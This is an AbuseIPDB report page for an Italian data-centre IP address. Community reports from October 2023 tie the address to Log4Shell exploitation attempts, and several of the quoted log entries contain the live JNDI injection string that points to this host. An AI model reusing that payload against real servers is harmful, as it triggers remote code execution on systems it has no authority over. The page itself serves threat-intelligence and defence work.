JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 93.95.216.134

93.95.216.134 was found in our database!

This IP was reported 18 times. Confidence of Abuse is 0%: ?

ISP	Serverplan network1
Usage Type	Data Center/Web Hosting/Transit
ASN	AS52030
Hostname(s)	d01rcy-moodlenew.sphostserver.com
Domain Name	serverplan.com
Country	🇮🇹 Italy
City	Rome, Lazio

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 93.95.216.134

Whois 93.95.216.134

IP Abuse Reports for 93.95.216.134:

This IP address has been reported a total of 18 times from 16 distinct sources. 93.95.216.134 was first reported on October 3rd 2023, and the most recent report was 2 years ago.

Old Reports: The most recent abuse report for this IP address is from 2 years ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇦🇺 siliconphoenix	2023-10-18 10:42:38 (2 years ago)	log4j exploitation attempt	Hacking
🇵🇹 fru fru	2023-10-06 12:59:28 (2 years ago)	Used as payload source in a log4j exploitation attempt	Hacking Web App Attack
🇬🇷 JCB	2023-10-05 13:21:06 (2 years ago)	Log4Shell: GET /${jndi:ldap://93.95.216.134:1389/Exploit}	Hacking Web App Attack
🇫🇮 jko	2023-10-05 09:47:42 (2 years ago)	${jndi:ldap://93.95.216.134:1389/Exploit}	Web App Attack
🇬🇧 Shadymint	2023-10-05 09:02:44 (2 years ago)	url probing from IP marked as abusive	Web App Attack
🇹🇷 non4me	2023-10-05 08:40:21 (2 years ago)	${jndi:ldap://93.95.216.134:1389/Exploit	Hacking Web App Attack
🇳🇿 PoSitRon	2023-10-04 23:22:15 (2 years ago)	used as a backend for log4j endpoint: 74.50.86.167 has scanned and attempted to exploit 160.119.99 ... show more used as a backend for log4j endpoint: 74.50.86.167 has scanned and attempted to exploit 160.119.99.14 with a JNDI lookup exploit. The attempt was made with the user_agent: ${jndi:ldap://93.95.216.134:1389/Exploit} and uri: /${jndi:ldap://93.95.216.134:1389/Exploit}. show less	Hacking
🇬🇧 Shadymint	2023-10-04 21:10:25 (2 years ago)	url probing from IP marked as abusive	Web App Attack
🇺🇸 AnonAdmin	2023-10-04 13:19:02 (2 years ago)	Apache.Log4j.Error.Log.Remote.Code.Execution	Hacking
🇩🇪 MaGGs	2023-10-04 07:36:51 (2 years ago)	Remote Code Execution -2.h (CVE-2021-44228) signature_cat: Web threats sig_vers: 18.283 host: 31.16. ... show more Remote Code Execution -2.h (CVE-2021-44228) signature_cat: Web threats sig_vers: 18.283 host: 31.16.xxx.yyy path: /${jndi:ldap://93.95.216.134:1389/Exploit} show less	Hacking Web App Attack
🇸🇪 MrBister	2023-10-04 05:21:06 (2 years ago)	"GET /${jndi:ldap://93.95.216.134:1389/Exploit} HTTP/1.1"	Web App Attack
🇷🇸 Smel	2023-10-03 23:22:04 (2 years ago)	HTTP/80/443/8080 Unauthorized Probe, Hack -	Hacking Web App Attack
Anonymous	2023-10-03 22:20:25 (2 years ago)	Common attack or app scan event detected and blocked	Port Scan Hacking Web App Attack
Anonymous	2023-10-03 22:04:29 (2 years ago)	jndi:ldap://93.95.216.134:1389/exploit from 51.79.19.53 and 139.224.230.172	Web App Attack
🇺🇸 NXTwoThou	2023-10-03 21:02:35 (2 years ago)	/${jndi:ldap:/93.95.216.134:1389/Exploit}	Web App Attack

Showing 1 to 15 of 18 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇧🇪 130.211.104.254

🇹🇼 111.70.9.143

🇨🇳 110.185.173.167

🇫🇷 85.217.140.18

🇺🇸 66.132.186.232

🇳🇱 45.148.10.240

🇮🇳 43.248.153.132

🇹🇿 41.93.28.12

🇧🇪 35.240.97.62

🇸🇪 2400:cb00:1031:1000:5dba:31a2:e976:af28

🇰🇷 211.107.217.244

🇷🇺 193.232.29.184

🇺🇸 162.254.36.150

🇺🇸 150.107.38.209

🇨🇳 139.210.171.206

🇧🇹 103.133.216.202

🇷🇺 95.188.68.96

🇲🇾 49.124.153.61

🇨🇳 39.78.142.77

🇬🇧 3.8.165.106